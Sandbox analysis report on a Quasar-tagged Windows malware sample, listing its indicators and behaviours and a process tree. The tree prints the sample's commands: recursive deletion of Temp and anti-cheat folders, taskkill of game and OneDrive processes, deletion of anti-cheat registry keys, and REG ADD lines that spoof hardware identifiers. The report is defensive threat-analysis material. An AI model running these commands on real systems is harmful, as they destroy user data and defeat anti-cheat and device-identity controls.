quasar | 3b6f8fe87241a3af1ff1414c5223a20b97f2bb2b7b7a9cb574077e253fb6db88

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Hsjdosj.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Hsjdosj.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	Gptmvmjkvvg.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	networkclean.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 5 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral2/files/0x000400000001e7c9-134.dat	themida
behavioral2/files/0x000400000001e7c9-136.dat	themida
behavioral2/memory/1636-147-0x00007FF6531C0000-0x00007FF653997000-memory.dmp	themida
behavioral2/memory/1636-148-0x00007FF6531C0000-0x00007FF653997000-memory.dmp	themida
behavioral2/memory/1636-159-0x00007FF6531C0000-0x00007FF653997000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Hsjdosj.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
12	ip-api.com

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\Images.exe	Gptmvmjkvvg.exe
File opened for modification	C:\Windows\SysWOW64\Images.exe	Gptmvmjkvvg.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
1636	Hsjdosj.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\IME\devcon.exe	Hsjdosj.exe
File created	C:\Windows\IME\networkclean.exe	Hsjdosj.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
1336	schtasks.exe

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key created	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1\Identifier	reg.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1\Identifier = "Apple-21407-27105-3234714492"	reg.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct = "Apple-214072710532347"	reg.exe
Key created	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier	reg.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier = "Apple-21407-27105-3234714492"	reg.exe
Key created	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1	reg.exe

Gathers network information 2 TTPs 6 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

Command-Line Interface

T1059

pid	Process
2232	ipconfig.exe
1588	ipconfig.exe
3000	ipconfig.exe
4532	ipconfig.exe
3176	ipconfig.exe
4148	ipconfig.exe

Kills process with taskkill 14 IoCs

evasion

pid	Process
1160	taskkill.exe
1064	taskkill.exe
4768	taskkill.exe
680	taskkill.exe
404	taskkill.exe
4584	taskkill.exe
2596	taskkill.exe
4176	taskkill.exe
3208	taskkill.exe
684	taskkill.exe
2764	taskkill.exe
960	taskkill.exe
1852	taskkill.exe
3252	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Migration	reg.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Migration\IE Installed Date = 0214172658220403211452543918904236812482512839	reg.exe

Modifies registry class 5 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Interface\ClsidStore = 021413158342539298501512414977205692775229095161511713610202	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Installer\Dependencies	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Installer	reg.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Installer\Dependencies\MSICache = 02141726582204032114525439189042368124825128391000316988	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Interface	reg.exe

Modifies registry key 1 TTPs 64 IoCs

Modify Registry

T1112

pid	Process
4964	reg.exe
936	reg.exe
1796	reg.exe
4400	reg.exe
1516	reg.exe
4440	reg.exe
1788	reg.exe
2748	reg.exe
2968	reg.exe
3252	reg.exe
4392	reg.exe
3556	reg.exe
3556	reg.exe
3276	reg.exe
2560	reg.exe
4380	reg.exe
2100	reg.exe
684	reg.exe
4088	reg.exe
744	reg.exe
732	reg.exe
4816	reg.exe
3288	reg.exe
3820	reg.exe
392	reg.exe
1500	reg.exe
2952	reg.exe
1720	reg.exe
3952	reg.exe
1908	reg.exe
2952	reg.exe
4488	reg.exe
2484	reg.exe
3628	reg.exe
3724	reg.exe
4380	reg.exe
5060	reg.exe
116	reg.exe
4580	reg.exe
5096	reg.exe
3204	reg.exe
1016	reg.exe
4832	reg.exe
968	reg.exe
4516	reg.exe
2584	reg.exe
2856	reg.exe
4952	reg.exe
2560	reg.exe
3808	reg.exe
1336	reg.exe
956	reg.exe
2752	reg.exe
3988	reg.exe
3556	reg.exe
3808	reg.exe
4644	reg.exe
1328	reg.exe
2848	reg.exe
1972	reg.exe
2588	reg.exe
3744	reg.exe
5024	reg.exe
4584	reg.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3612	PING.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4644	Oajujxo.exe
4644	Oajujxo.exe

Suspicious use of AdjustPrivilegeToken 58 IoCs

description	pid	Process
Token: SeDebugPrivilege	4644	Oajujxo.exe
Token: SeDebugPrivilege	1288	Gptmvmjkvvg.exe
Token: SeDebugPrivilege	680	taskkill.exe
Token: SeDebugPrivilege	960	taskkill.exe
Token: SeDebugPrivilege	404	taskkill.exe
Token: SeDebugPrivilege	4584	taskkill.exe
Token: SeDebugPrivilege	3208	taskkill.exe
Token: SeDebugPrivilege	1160	taskkill.exe
Token: SeDebugPrivilege	1852	taskkill.exe
Token: SeDebugPrivilege	2596	taskkill.exe
Token: SeDebugPrivilege	684	taskkill.exe
Token: SeDebugPrivilege	3252	taskkill.exe
Token: SeDebugPrivilege	1064	taskkill.exe
Token: SeDebugPrivilege	4176	taskkill.exe
Token: SeDebugPrivilege	2764	taskkill.exe
Token: SeDebugPrivilege	4768	taskkill.exe
Token: SeIncreaseQuotaPrivilege	5076	WMIC.exe
Token: SeSecurityPrivilege	5076	WMIC.exe
Token: SeTakeOwnershipPrivilege	5076	WMIC.exe
Token: SeLoadDriverPrivilege	5076	WMIC.exe
Token: SeSystemProfilePrivilege	5076	WMIC.exe
Token: SeSystemtimePrivilege	5076	WMIC.exe
Token: SeProfSingleProcessPrivilege	5076	WMIC.exe
Token: SeIncBasePriorityPrivilege	5076	WMIC.exe
Token: SeCreatePagefilePrivilege	5076	WMIC.exe
Token: SeBackupPrivilege	5076	WMIC.exe
Token: SeRestorePrivilege	5076	WMIC.exe
Token: SeShutdownPrivilege	5076	WMIC.exe
Token: SeDebugPrivilege	5076	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5076	WMIC.exe
Token: SeRemoteShutdownPrivilege	5076	WMIC.exe
Token: SeUndockPrivilege	5076	WMIC.exe
Token: SeManageVolumePrivilege	5076	WMIC.exe
Token: 33	5076	WMIC.exe
Token: 34	5076	WMIC.exe
Token: 35	5076	WMIC.exe
Token: 36	5076	WMIC.exe
Token: SeIncreaseQuotaPrivilege	5076	WMIC.exe
Token: SeSecurityPrivilege	5076	WMIC.exe
Token: SeTakeOwnershipPrivilege	5076	WMIC.exe
Token: SeLoadDriverPrivilege	5076	WMIC.exe
Token: SeSystemProfilePrivilege	5076	WMIC.exe
Token: SeSystemtimePrivilege	5076	WMIC.exe
Token: SeProfSingleProcessPrivilege	5076	WMIC.exe
Token: SeIncBasePriorityPrivilege	5076	WMIC.exe
Token: SeCreatePagefilePrivilege	5076	WMIC.exe
Token: SeBackupPrivilege	5076	WMIC.exe
Token: SeRestorePrivilege	5076	WMIC.exe
Token: SeShutdownPrivilege	5076	WMIC.exe
Token: SeDebugPrivilege	5076	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5076	WMIC.exe
Token: SeRemoteShutdownPrivilege	5076	WMIC.exe
Token: SeUndockPrivilege	5076	WMIC.exe
Token: SeManageVolumePrivilege	5076	WMIC.exe
Token: 33	5076	WMIC.exe
Token: 34	5076	WMIC.exe
Token: 35	5076	WMIC.exe
Token: 36	5076	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4332 wrote to memory of 1636	4332	3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe	79
PID 4332 wrote to memory of 1636	4332	3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe	79
PID 4332 wrote to memory of 1288	4332	3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe	81
PID 4332 wrote to memory of 1288	4332	3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe	81
PID 4332 wrote to memory of 1288	4332	3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe	81
PID 4332 wrote to memory of 4644	4332	3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe	82
PID 4332 wrote to memory of 4644	4332	3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe	82
PID 4332 wrote to memory of 4644	4332	3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe	82
PID 1288 wrote to memory of 1336	1288	Gptmvmjkvvg.exe	85
PID 1288 wrote to memory of 1336	1288	Gptmvmjkvvg.exe	85
PID 1288 wrote to memory of 1336	1288	Gptmvmjkvvg.exe	85
PID 1288 wrote to memory of 2956	1288	Gptmvmjkvvg.exe	88
PID 1288 wrote to memory of 2956	1288	Gptmvmjkvvg.exe	88
PID 1288 wrote to memory of 2956	1288	Gptmvmjkvvg.exe	88
PID 1636 wrote to memory of 4412	1636	Hsjdosj.exe	91
PID 1636 wrote to memory of 4412	1636	Hsjdosj.exe	91
PID 2956 wrote to memory of 3920	2956	cmd.exe	92
PID 2956 wrote to memory of 3920	2956	cmd.exe	92
PID 2956 wrote to memory of 3920	2956	cmd.exe	92
PID 1636 wrote to memory of 112	1636	Hsjdosj.exe	93
PID 1636 wrote to memory of 112	1636	Hsjdosj.exe	93
PID 2956 wrote to memory of 3612	2956	cmd.exe	95
PID 2956 wrote to memory of 3612	2956	cmd.exe	95
PID 2956 wrote to memory of 3612	2956	cmd.exe	95
PID 1636 wrote to memory of 3556	1636	Hsjdosj.exe	96
PID 1636 wrote to memory of 3556	1636	Hsjdosj.exe	96
PID 1636 wrote to memory of 544	1636	Hsjdosj.exe	97
PID 1636 wrote to memory of 544	1636	Hsjdosj.exe	97
PID 1636 wrote to memory of 4208	1636	Hsjdosj.exe	98
PID 1636 wrote to memory of 4208	1636	Hsjdosj.exe	98
PID 4208 wrote to memory of 680	4208	cmd.exe	99
PID 4208 wrote to memory of 680	4208	cmd.exe	99
PID 1636 wrote to memory of 632	1636	Hsjdosj.exe	100
PID 1636 wrote to memory of 632	1636	Hsjdosj.exe	100
PID 632 wrote to memory of 960	632	cmd.exe	101
PID 632 wrote to memory of 960	632	cmd.exe	101
PID 1636 wrote to memory of 1080	1636	Hsjdosj.exe	102
PID 1636 wrote to memory of 1080	1636	Hsjdosj.exe	102
PID 1080 wrote to memory of 404	1080	cmd.exe	103
PID 1080 wrote to memory of 404	1080	cmd.exe	103
PID 1636 wrote to memory of 384	1636	Hsjdosj.exe	104
PID 1636 wrote to memory of 384	1636	Hsjdosj.exe	104
PID 384 wrote to memory of 4584	384	cmd.exe	105
PID 384 wrote to memory of 4584	384	cmd.exe	105
PID 1636 wrote to memory of 4488	1636	Hsjdosj.exe	106
PID 1636 wrote to memory of 4488	1636	Hsjdosj.exe	106
PID 4488 wrote to memory of 3208	4488	cmd.exe	107
PID 4488 wrote to memory of 3208	4488	cmd.exe	107
PID 1636 wrote to memory of 1084	1636	Hsjdosj.exe	110
PID 1636 wrote to memory of 1084	1636	Hsjdosj.exe	110
PID 1084 wrote to memory of 1160	1084	cmd.exe	111
PID 1084 wrote to memory of 1160	1084	cmd.exe	111
PID 1636 wrote to memory of 5004	1636	Hsjdosj.exe	112
PID 1636 wrote to memory of 5004	1636	Hsjdosj.exe	112
PID 5004 wrote to memory of 1852	5004	cmd.exe	113
PID 5004 wrote to memory of 1852	5004	cmd.exe	113
PID 1636 wrote to memory of 2200	1636	Hsjdosj.exe	114
PID 1636 wrote to memory of 2200	1636	Hsjdosj.exe	114
PID 2200 wrote to memory of 2596	2200	cmd.exe	115
PID 2200 wrote to memory of 2596	2200	cmd.exe	115
PID 1636 wrote to memory of 2488	1636	Hsjdosj.exe	116
PID 1636 wrote to memory of 2488	1636	Hsjdosj.exe	116
PID 2488 wrote to memory of 684	2488	cmd.exe	117
PID 2488 wrote to memory of 684	2488	cmd.exe	117

C:\Users\Admin\AppData\Local\Temp\3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe
"C:\Users\Admin\AppData\Local\Temp\3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4332
- C:\Users\Admin\AppData\Local\Temp\Hsjdosj.exe
  "C:\Users\Admin\AppData\Local\Temp\Hsjdosj.exe"
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Drops file in Windows directory
  - Suspicious use of WriteProcessMemory
  PID:1636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c Color 0b
    3⤵
    PID:4412
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Temp
    3⤵
    PID:112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Roaming\EasyAntiCheat
    3⤵
    PID:3556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4208
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im EpicGamesLauncher.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im steam.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:632
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im steam.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1080
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im FortniteClient-Win64-Shipping.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im OneDrive.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:384
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im OneDrive.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4488
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im EpicGamesLauncher.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1084
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im EpicGamesLauncher.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5004
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im EpicGamesLauncher.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2200
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im EpicGamesLauncher.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2488
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im EpicGamesLauncher.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:2856
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im EpicGamesLauncher.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:1948
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im EpicGamesLauncher.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:856
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im EpicGamesLauncher.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:3896
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im EpicGamesLauncher.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:4928
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im EpicGamesLauncher.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\WOW6432Node\EasyAntiCheat /f
    3⤵
    PID:4348
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\WOW6432Node\EasyAntiCheat /f
      4⤵
      Modifies registry key
      PID:744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f
    3⤵
    PID:4020
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f
      4⤵
      PID:2020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\ControlSet001\Services\BEService /f
    3⤵
    PID:4216
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\ControlSet001\Services\BEService /f
      4⤵
      Modifies registry key
      PID:732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d DESKTOP-%random% /f
    3⤵
    PID:1848
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d DESKTOP-21404 /f
      4⤵
      Modifies registry key
      PID:4964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d DESKTOP-%random% /f
    3⤵
    PID:5024
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d DESKTOP-21404 /f
      4⤵
      Modifies registry key
      PID:5060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d Apple%random%-%random%-%random%-%random% /f
    3⤵
    PID:1528
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d Apple21404-16357-14483-23196 /f
      4⤵
      PID:4728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\HardwareConfig /v LastConfig /t REG_SZ /d {Apple-%random%-%random} /f
    3⤵
    PID:1704
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\HardwareConfig /v LastConfig /t REG_SZ /d {Apple-21404-%random} /f
      4⤵
      Modifies registry key
      PID:1336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\HardwareConfig\Current /v BaseBoardProduct /t REG_SZ /d Apple-%random%%random%%random% /f
    3⤵
    PID:4956
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\HardwareConfig\Current /v BaseBoardProduct /t REG_SZ /d Apple-214072710532347 /f
      4⤵
      Modifies registry key
      PID:936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLab /t REG_SZ /d Apple-%random% /f
    3⤵
    PID:2352
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLab /t REG_SZ /d Apple-21407 /f
      4⤵
      PID:3228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLabEx /t REG_SZ /d Apple-%random% /f
    3⤵
    PID:4128
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLabEx /t REG_SZ /d Apple-21407 /f
      4⤵
      Modifies registry key
      PID:116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DESCRIPTION\System\BIOS /v BaseBoardProduct /t REG_SZ /d Apple-%random%%random%%random% /f
    3⤵
    PID:1876
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\HARDWARE\DESCRIPTION\System\BIOS /v BaseBoardProduct /t REG_SZ /d Apple-214072710532347 /f
      4⤵
      Enumerates system info in registry
      Modifies registry key
      PID:4580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\ControlSet001\Services\kbdclass\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {Apple-%random%-%random%-%random%%random%} /f
    3⤵
    PID:556
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\ControlSet001\Services\kbdclass\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {Apple-21407-27105-3234714492} /f
      4⤵
      PID:2572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\ControlSet001\Services\mouhid\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {Apple-%random%-%random%-%random%%random%} /f
    3⤵
    PID:2268
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\ControlSet001\Services\mouhid\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {Apple-21407-27105-3234714492} /f
      4⤵
      Modifies registry key
      PID:3556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d {Apple-%random%-%random%-%random%%random%} /f
    3⤵
    PID:4848
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d {Apple-21407-27105-3234714492} /f
      4⤵
      PID:2952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildBranch /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    3⤵
    PID:2956
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildBranch /t REG_SZ /d Apple-21407-27105-3234714492 /f
      4⤵
      PID:3808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    3⤵
    PID:544
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d Apple-21407-27105-3234714492 /f
      4⤵
      Modifies registry key
      PID:2968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLab /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    3⤵
    PID:668
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLab /t REG_SZ /d Apple-21407-27105-3234714492 /f
      4⤵
      PID:680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "0\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    3⤵
    PID:3396
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "0\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d Apple-21407-27105-3234714492 /f
      4⤵
      Modifies registry key
      PID:5096
